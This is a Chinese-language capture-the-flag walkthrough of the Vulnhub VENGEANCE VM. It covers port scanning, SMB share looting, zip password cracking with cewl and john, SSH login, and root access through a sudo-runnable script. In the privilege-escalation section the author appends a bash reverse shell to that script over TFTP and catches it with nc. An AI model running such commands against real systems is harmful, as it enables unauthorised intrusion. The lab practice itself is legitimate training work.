靶机渗透练习58-digitalworld.local:VENGEANCE
靶机描述
靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/
Description
2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing his PEN-300 course. But the author always has a heart for the OSCP, which explains yet another OSCP-like box, full of enumeration goodness.
If you MUST have hints for this machine (even though they will probably not help you very much until you root the box!): VENGEANCE is (#1): all about users making use of other users, (#2): broken hearts, (#3): broken minds.
Note: Always think like a user when enumerating target machine.
Feel free to contact the author at https://donavan.sg/blog if you would like to drop a comment.
一、搭建靶机环境
攻击机Kali
:
IP地址:192.168.128.128
靶机
:
IP地址:192.168.128.133
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VMware Workstation,设置为NAT 模式
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth1 -l
⬢ VENGEANCE arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:b5:12:9d, IPv4: 192.168.128.128
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.128.1 00:50:56:c0:00:08 VMware, Inc.
192.168.128.2 00:50:56:f4:41:f5 VMware, Inc.
192.168.128.133 00:0c:29:85:46:6e VMware, Inc.
192.168.128.254 00:50:56:fb:5c:73 VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.931 seconds (132.57 hosts/sec). 4 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip
查看靶机开放的端口
⬢ kali nmap -A -sV -T4 -p- 192.168.128.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 11:31 CST
Nmap scan report for bogon (192.168.128.133)
Host is up (0.00032s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7/tcp closed echo
22/tcp closed ssh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
88/tcp closed kerberos-sec
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS UIDL RESP-CODES TOP PIPELINING AUTH-RESP-CODE CAPA
|_auth-owners: dovenull
113/tcp open ident?
|_auth-owners: root
139/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
143/tcp open imap Dovecot imapd (Ubuntu)
|_auth-owners: dovenull
|_imap-capabilities: SASL-IR ID Pre-login IDLE STARTTLS IMAP4rev1 OK listed post-login more ENABLE capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS have LITERAL+
161/tcp closed snmp
389/tcp closed ldap
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2021-02-14T02:40:28
|_Not valid after: 2022-02-14T02:40:28
| tls-nextprotoneg:
| h2
|_ http/1.1
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_auth-owners: www-data
445/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
993/tcp open tcpwrapped
995/tcp open tcpwrapped
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
| 256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
|_ 256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
|_auth-owners: root
54321/tcp closed unknown
MAC Address: 00:0C:29:85:46:6E (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-25T03:34:11
|_ start_date: N/ATRACEROUTE
HOP RTT ADDRESS
1 0.31 ms bogon (192.168.128.133)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.62 seconds
开放了以下端口
80—http—nginx 1.18.0 (Ubuntu)
111—pop3—Dovecot pop3d
113—ident?
139—netbios-ssn—Samba smbd 4.6.2
143—imap—Dovecot imapd (Ubuntu)
443—ssl/http—nginx 1.18.0 (Ubuntu)
445—netbios-ssn—Samba smbd 4.6.2
993—tcpwrapped
995—tcpwrapped
22222—ssh—OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
2.2枚举漏洞
2.2.1 80 端口分析
访问:http://192.168.128.133/
发现需要将vengeance.goodtech.inc
添加到/etc/hosts
访问:http://vengeance.goodtech.inc/
这是一个WordPress
站,简单看了一下,没什么发现
扫描一下目录:dirsearch -u http://vengeance.goodtech.inc
⬢ VENGEANCE dirsearch -u http://vengeance.goodtech.inc _|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/vengeance.goodtech.inc/_22-03-25_14-49-12.txtError Log: /root/.dirsearch/logs/errors-22-03-25_14-49-12.logTarget: http://vengeance.goodtech.inc/[14:49:12] Starting:
[14:49:12] 200 - 220B - /.bash_logout
[14:49:12] 200 - 4KB - /.bashrc
[14:49:13] 403 - 564B - /.ht_wsr.txt
[14:49:13] 403 - 564B - /.htaccess.orig
[14:49:13] 403 - 564B - /.htaccess.sample
[14:49:13] 403 - 564B - /.htaccess.save
[14:49:13] 403 - 564B - /.htaccess_orig
[14:49:13] 403 - 564B - /.htaccess_extra
[14:49:13] 403 - 564B - /.htaccess.bak1
[14:49:13] 403 - 564B - /.htaccessOLD
[14:49:13] 403 - 564B - /.htaccessBAK
[14:49:13] 403 - 564B - /.htaccessOLD2
[14:49:13] 403 - 564B - /.htaccess_sc
[14:49:13] 403 - 564B - /.htm
[14:49:13] 403 - 564B - /.html
[14:49:13] 403 - 564B - /.httr-oauth
[14:49:13] 403 - 564B - /.htpasswd_test
[14:49:13] 403 - 564B - /.htpasswds
[14:49:13] 200 - 807B - /.profile
[14:49:17] 403 - 564B - /admin/.htaccess
[14:49:19] 403 - 564B - /administrator/.htaccess
[14:49:20] 403 - 564B - /app/.htaccess
[14:49:27] 200 - 19KB - /license.txt
[14:49:31] 301 - 0B - /index.php -> http://vengeance.goodtech.inc/
[14:49:32] 200 - 7KB - /readme.html
[14:49:37] 301 - 178B - /wp-admin -> http://vengeance.goodtech.inc/wp-admin/
[14:49:37] 403 - 3KB - /wp-admin/
[14:49:37] 200 - 1KB - /wp-admin/install.php
[14:49:37] 400 - 1B - /wp-admin/admin-ajax.php
[14:49:37] 200 - 0B - /wp-config.php
[14:49:37] 409 - 3KB - /wp-admin/setup-config.php
[14:49:37] 301 - 178B - /wp-content -> http://vengeance.goodtech.inc/wp-content/
[14:49:37] 200 - 0B - /wp-content/
[14:49:37] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[14:49:37] 403 - 564B - /wp-content/uploads/
[14:49:37] 200 - 0B - /wp-cron.php
[14:49:37] 403 - 564B - /wp-includes/
[14:49:37] 301 - 178B - /wp-includes -> http://vengeance.goodtech.inc/wp-includes/
[14:49:37] 200 - 0B - /wp-includes/rss-functions.php
[14:49:37] 403 - 564B - /wp-content/upgrade/
[14:49:37] 405 - 42B - /xmlrpc.phpTask Completed
⬢ VENGEANCE
简单扫描后,没什么特殊发现,源码也没有什么特殊的
2.2.2 SMB分析
用 enum4linux
扫描一下:enum4linux 192.168.128.133 | tee vengance.txt
扫描出 smb 服务器中的文件夹sarapublic$
扫描出两个系统用户:sara
、qinyi
使用smbclient
查看一下 smb 服务器中的 sarapublic$
文件夹:
⬢ VENGEANCE smbclient -N \\\\192.168.128.133\\sarapublic$
Try "help" to get a list of possible commands.
smb: \> ls. D 0 Mon Mar 8 18:28:35 2021.. D 0 Mon Mar 8 18:29:24 2021eaurouge.txt N 11 Mon Mar 8 10:46:53 2021eaurouge N 110 Tue Feb 23 19:06:40 2021essay.txt N 1257 Mon Mar 8 18:28:34 2021gio.zip N 11150297 Sun Feb 21 13:48:13 2021cognac D 0 Wed Feb 24 01:48:47 2021blurb.txt N 525 Mon Mar 8 10:55:24 2021champagne D 0 Wed Feb 24 00:15:07 2021profile.txt N 337 Mon Mar 8 10:45:26 202119475088 blocks of size 1024. 10933384 blocks available
smb: \>
将其都下载下来
smb: \> get eaurouge.txt
getting file \eaurouge.txt of size 11 as eaurouge.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get eaurouge
getting file \eaurouge of size 110 as eaurouge (4.5 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \> get essay.txt
getting file \essay.txt of size 1257 as essay.txt (72.2 KiloBytes/sec) (average 21.7 KiloBytes/sec)
smb: \> get gio.zip
getting file \gio.zip of size 11150297 as gio.zip (21865.4 KiloBytes/sec) (average 19447.0 KiloBytes/sec)
smb: \> get cognac
NT_STATUS_FILE_IS_A_DIRECTORY opening remote file \cognac
smb: \> get blurb.txt
getting file \blurb.txt of size 525 as blurb.txt (25.6 KiloBytes/sec) (average 18777.3 KiloBytes/sec)
smb: \> get profile.txt
getting file \profile.txt of size 337 as profile.txt (7.0 KiloBytes/sec) (average 17370.3 KiloBytes/sec)
smb: \> cd cognac\
smb: \cognac\> ls -al
NT_STATUS_NO_SUCH_FILE listing \cognac\-al
smb: \cognac\> ls. D 0 Wed Feb 24 01:48:47 2021.. D 0 Mon Mar 8 18:28:35 2021to-do N 200 Wed Feb 24 01:48:47 202119475088 blocks of size 1024. 10933376 blocks available
smb: \cognac\> get to-do
getting file \cognac\to-do of size 200 as to-do (6.1 KiloBytes/sec) (average 16527.1 KiloBytes/sec)
smb: \cognac\> cd ..
smb: \> cd champagne\
smb: \champagne\> ls. D 0 Wed Feb 24 00:15:07 2021.. D 0 Mon Mar 8 18:28:35 2021www.domperignon.com D 0 Wed Feb 24 00:07:08 202119475088 blocks of size 1024. 10933372 blocks available
smb: \champagne\> cd www.domperignon.com\
smb: \champagne\www.domperignon.com\> ls. D 0 Wed Feb 24 00:07:08 2021.. D 0 Wed Feb 24 00:15:07 2021sites D 0 Wed Feb 24 00:04:56 2021robots.txt N 17739 Wed Feb 3 00:00:17 2021index.html.tmp N 18766 Wed Feb 3 00:00:17 2021ruxitagentjs_ICA27SVfjqrx_10203201027145855.js N 193811 Thu Dec 10 23:23:49 2020fr-fr D 0 Wed Feb 24 00:09:25 2021ww-fr D 0 Wed Feb 24 00:06:57 2021ww-en D 0 Wed Feb 24 00:04:55 2021misc D 0 Wed Feb 24 00:09:17 2021ww-es D 0 Wed Feb 24 00:07:10 202119475088 blocks of size 1024. 10933372 blocks available
smb: \champagne\www.domperignon.com\> get robots.txt
getting file \champagne\www.domperignon.com\robots.txt of size 17739 as robots.txt (173.2 KiloBytes/sec) (average 14372.4 KiloBytes/sec)
smb: \champagne\www.domperignon.com\>
查看其内容
blurb.txt
内容如下
⬢ VENGEANCE cat blurb.txt
Blurb about guards:How do you guard against a thief from the inside?Blurb about workers:Why do workers always set passwords related to their jobs?Blurb about security:Security has both "U" and "I" in it. Everyone must do their part!Blurb about passwords:Passwords are words that guard the pass.Blurb about nonsense:Sense is a subset of "nonsense"; all sensible talk, to others who don't understand, can be construed as nonsense.Blurb about trying harder:We all try harder in whatever we do. Try harder!
eaurouge
内容如下
⬢ VENGEANCE cat eaurouge
#!/bin/bash# I don't know how to script stuff... so I'm trying something.echo 'I am silly' > eaurouge.txt
⬢ VENGEANCE
eaurouge.txt
内容如下
⬢ VENGEANCE cat eaurouge.txt
I am silly
⬢ VENGEANCE
essay.txt
内容如下
⬢ VENGEANCE cat essay.txt
One fine morning, I looked out of the window and saw the sun rise.It was a frenetic Friday. Amidst the warm sun rays projecting its glow through my room, there was a mad dash to solve a serious issue back at HQ. It felt eerily close.Our servers were hacked.We were in real trouble. The daydreaming had to stop. Without brushing my teeth, I stormed out of the house and prayed that it will all be OK.Except things were anything except OK. The attackers seemed to have taken control of our development domain. This was apocalyptic.The attackers managed to make away with our nanotechnological intellectual property. Additionally, the attackers deleted our latest development product, the ARCEUS X-FORCE. It was unknown if the attackers decided to sell ARCEUS X-FORCE illegally.On closer inspection, we realised that this was an insider job. Govindasamy did an investigation, revealing that Qinyi was attempting to log into the development servers without prior permission. That was clearly a red flag, resulting in Govindasamy looking through her access rights.We discovered that, due to a misconfiguration, she had granted herself access rights that were otherwise not supposed to have been granted. We have since removed these access rights.
⬢ VENGEANCE
profile.txt
内容如下
⬢ VENGEANCE cat profile.txt
Draft profile for Giovanni:- worked in nanotechnological fields for 15 years
- hails from Milan
- worked on CNTs, graphene for device fabrication
- CEO of multiple nanotech firms in Tokyo, Singapore and Milan
- collaborating with Good Tech Inc. on R&D project
- keynote speaker of the "Good Tech Inc. Chip Fabrication Project" in 2019
⬢ VENGEANCE
to-do
内容如下
⬢ VENGEANCE cat to-do
1. compare between martell, remy martin, hennesey, courvoiser.2. decide how we want to advertise the cognac brand we pick.3. investigate why qinyi's looking into carbon nanotubes all of a sudden.
⬢ VENGEANCE
没有什么可利用的信息
robots.txt
也没有可利用的信息
gio.zip
打开需要密码
密码应该隐藏在上面下载的那几个文件里,先把那几个文件做成密码本,使用cewl
字典生成工具生成密码本,先在本地开启个 http 服务,然后利用cewl
爬取文件关键字生成密码本:
cewl 192.168.128.128:8000/blurb.txt >> pass.txt
cewl 192.168.128.128:8000/eaurouge >> pass.txt
cewl 192.168.128.128:8000/eaurouge.txt >> pass.txt
cewl 192.168.128.128:8000/essay.txt >> pass.txt
cewl 192.168.128.128:8000/profile.txt >> pass.txt
cewl 192.168.128.128:8000/to-do >> pass.txt
利用生成的密码本爆破一下 zip 文件:
⬢ VENGEANCE john --wordlist=pass.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nanotechnological (gio.zip)
1g 0:00:00:00 DONE (2022-03-25 15:28) 100.0g/s 24600p/s 24600c/s 24600C/s Blurb..sudden
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
⬢ VENGEANCE
解压压缩包,并查看一下内容
⬢ VENGEANCE unzip gio.zip
Archive: gio.zipcreating: gio/
[gio.zip] gio/pass_reminder.txt password: extracting: gio/pass_reminder.txt inflating: gio/ted_talk.pptx inflating: gio/tryharder.png
⬢ VENGEANCE cd gio
⬢ gio ls -al
总用量 11400
drwxr-xr-x 2 root root 4096 2月 15 2021 .
drwxr-xr-x 3 hirak0 kali 4096 3月 25 15:31 ..
-rw-r--r-- 1 root root 19 2月 15 2021 pass_reminder.txt
-rw-r--r-- 1 root root 11111194 2月 15 2021 ted_talk.pptx
-rw-r--r-- 1 root root 547545 2月 15 2021 tryharder.png
pass_reminder.txt
内容如下
name_corner_circuit#
姓名_(道路的)急转弯_线路
PPT文件内容如下,没啥东西,先放着
图片详情如下,检查了一下图片,看看是否隐藏信息,没有什么发现
回头看看,name_corner_circuit
内容好像跟PPT有联系
PPT中第一页有名字Giovanni Berlusconi
PPT中第三页有Suzuka 130R
,拆分一下130R
是个弯道,Suzuka
是线路
尝试组合出密码
Giovanni Berlusconi_130R_Suzuka
Giovanni Berlusconi_130r_Suzuka
Giovanni Berlusconi_130R_suzuka
Giovanni Berlusconi_130r_suzuka
giovanni berlusconi_130R_Suzuka
giovanni berlusconi_130R_suzuka
giovanni berlusconi_130r_Suzuka
giovanni berlusconi_130r_suzuka
Giovanni_130R_Suzuka
Giovanni_130r_Suzuka
Giovanni_130R_suzuka
Giovanni_130r_suzuka
giovanni_130R_Suzuka
giovanni_130R_suzuka
giovanni_130r_Suzuka
giovanni_130r_suzuka
用户在之前扫出来了两个 sara
和 qinyi
分别尝试登录
最后尝试出用户qinyi
与密码 giovanni_130R_Suzuka
成功登录
⬢ VENGEANCE ssh qinyi@192.168.128.133 -p 22222
The authenticity of host '[192.168.128.133]:22222 ([192.168.128.133]:22222)' can't be established.
ED25519 key fingerprint is SHA256:JGuTJL+RnrYpqCe3omn+FyXX8w820/GJnu5EbbpjcW4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.128.133]:22222' (ED25519) to the list of known hosts.
qinyi@192.168.128.133's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-65-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Fri 25 Mar 2022 07:54:56 AM UTCSystem load: 0.0 Processes: 234Usage of /: 38.7% of 18.57GB Users logged in: 0Memory usage: 20% IPv4 address for ens33: 192.168.128.133Swap usage: 0%15 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt updateThe programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.qinyi@vengeance:~$
2.3漏洞利用
。。。。。
2.4权限提升
2.4.1 信息收集
登录进去后,进行信息收集
uid=1001(qinyi) gid=1001(qinyi) groups=1001(qinyi)
qinyi@vengeance:~$ sudo -l
Matching Defaults entries for qinyi on vengeance:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser qinyi may run the following commands on vengeance:(root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
qinyi@vengeance:~$ /home/sara/private/eaurouge
-bash: /home/sara/private/eaurouge: Permission denied
qinyi@vengeance:~$
发现以 root 身份运行 /home/sara/private/eaurouge
,但是登录用户是qinyi
,没有权限访问
使用pspy64
进行信息收集
qinyi@vengeance:/tmp$ wget http://192.168.128.128/pspy64
--2022-03-25 08:00:04-- http://192.168.128.128/pspy64
Connecting to 192.168.128.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’pspy64 100%[=======================================================>] 2.94M --.-KB/s in 0.05s 2022-03-25 08:00:04 (59.7 MB/s) - ‘pspy64’ saved [3078592/3078592]qinyi@vengeance:/tmp$
发现在69
端口开着 tftp 服务,就在/home/sara/private
目录下,但是在之前并没有扫描出来这个端口
单独扫一下这个端口,看是否真的开启
⬢ VENGEANCE nmap -sU -p69 192.168.128.133
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 16:18 CST
Nmap scan report for vengeance.goodtech.inc (192.168.128.133)
Host is up (0.00022s latency).PORT STATE SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:85:46:6E (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
qinyi@vengeance:/tmp$ netstat -a | grep tftp
udp 0 0 0.0.0.0:tftp 0.0.0.0:*
udp6 0 0 [::]:tftp [::]:*
qinyi@vengeance:/tmp$
确实在运行,那就获取/home/sara/private/eaurouge
文件看一下:
⬢ VENGEANCE tftp 192.168.128.133
tftp> ls
?Invalid command
tftp> get eaurouge
Received 184 bytes in 0.1 seconds
tftp> q
查看一下内容
⬢ VENGEANCE cat eaurouge
#!/bin/bashtouch /home/sara/public/test.txtecho "Test file" > /home/sara/public/test.txtchown sara:sara /home/sara/public/test.txtchmod 644 /home/sara/public/test.txt
⬢ VENGEANCE
在脚本末尾添加反弹 shell:bash -c 'exec bash -i &>/dev/tcp/192.168.128.128/6666 <&1'
⬢ VENGEANCE vim eaurouge
⬢ VENGEANCE cat eaurouge
#!/bin/bashtouch /home/sara/public/test.txtecho "Test file" > /home/sara/public/test.txtchown sara:sara /home/sara/public/test.txtchmod 644 /home/sara/public/test.txtbash -c 'exec bash -i &>/dev/tcp/192.168.128.128/6666 <&1'
⬢ VENGEANCE
将其上传到靶机
⬢ VENGEANCE tftp 192.168.128.133
tftp> put eaurouge
Sent 246 bytes in 0.0 seconds
tftp>
kali本地监听一下:nc -lvp 6666
然后运行一下eaurouge
文件
qinyi@vengeance:/tmp$ sudo /home/sara/private/eaurouge
成功提权,并拿到flag
⬢ VENGEANCE nc -lvp 6666
listening on [any] 6666 ...
connect to [192.168.128.128] from vengeance.goodtech.inc [192.168.128.133] 38256
root@vengeance:/tmp# cd /root
cd /root
root@vengeance:~# ls
ls
proof.txt
snap
vengeance.crt
vengeance.key
root@vengeance:~# cat proof.txt
cat proof.txt
Root access obtained!Congratulations on breaking through the 6th box in the digitalworld.local series. Hope you enjoyed this one.
root@vengeance:~#
总结
本靶机首先通过enum4linux
信息收集得到smb共享文件夹以及用户名,smbclient
下载文件夹里边的文件,cewl
生成密码本爆破压缩包密码,最后通过sudo提权
enum4linux
信息收集smbclient
下载文件cewl
生成密码本- sudo提权
靶机渗透练习58-digitalworld.local:VENGEANCE相关推荐
- 靶机渗透练习53-digitalworld.local:BRAVERY
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/ Description This machine hope ...
- 靶机渗透练习56-digitalworld.local:TORMENT
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-torment,299/ Description This is the evil ...
- 17. CTF综合靶机渗透(十)
靶机描述: 欢迎来到超级马里奥主机! 这个虚拟机是对真实世界场景场景的模拟. 目标是在VM中找到2个标志.根是不够的(对不起!) VM可以以多种方式开发,但请记住枚举是关键. 挑战的程度是中等的. 感 ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
- dc-3 靶机渗透学习
靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...
- HackInOS靶机渗透writeup
HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP. 成功后打开的靶机图如下 0x01渗透过程 使用 ...
- HA: SHERLOCK 靶机渗透取证
HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
最新文章
- Windows下安装Redis服务
- Javascript Java C++系列
- TP5的请求响应参数
- 三菱880彩铅和uni的区别_彩铅测评|150色荷尔拜因彩铅初体验
- IO多路复用之select
- 它打败了欧几里得空间,踹飞了数学怪物,成为全世界的焦点
- IIoT 安防保卫战一触即发,Fortinet 亮剑
- 词嵌入 网络嵌入_深入研究词嵌入以进行情感分析
- 11.8 自动化测试脚本编写规范(1)
- Java语言程序设计(一)简答题和论述题
- vue2.0 + vux (四)Home页
- JNI用C加载JDK产生JVM虚拟机,并运行JAVA类main函数(MACOS/LINUX/WINDOWS)
- 微信小游戏排行榜功能快速开发教程
- 浅谈全概率公式和贝叶斯公式
- 油管大神教波士顿机器狗学撒尿-给自己倒啤酒,网友:太恶趣味了
- alm系统的使用流程_HPQC测试管理平台ALM操作使用手册.doc
- 2D游戏开发 - SkyGameEngine2d坐标系
- 补充:python实现二叉树里面求叶子节点的算法
- 基于matlab的SAR图像中自动目标识别
- java毕业设计学生组织管理系统Mybatis+系统+数据库+调试部署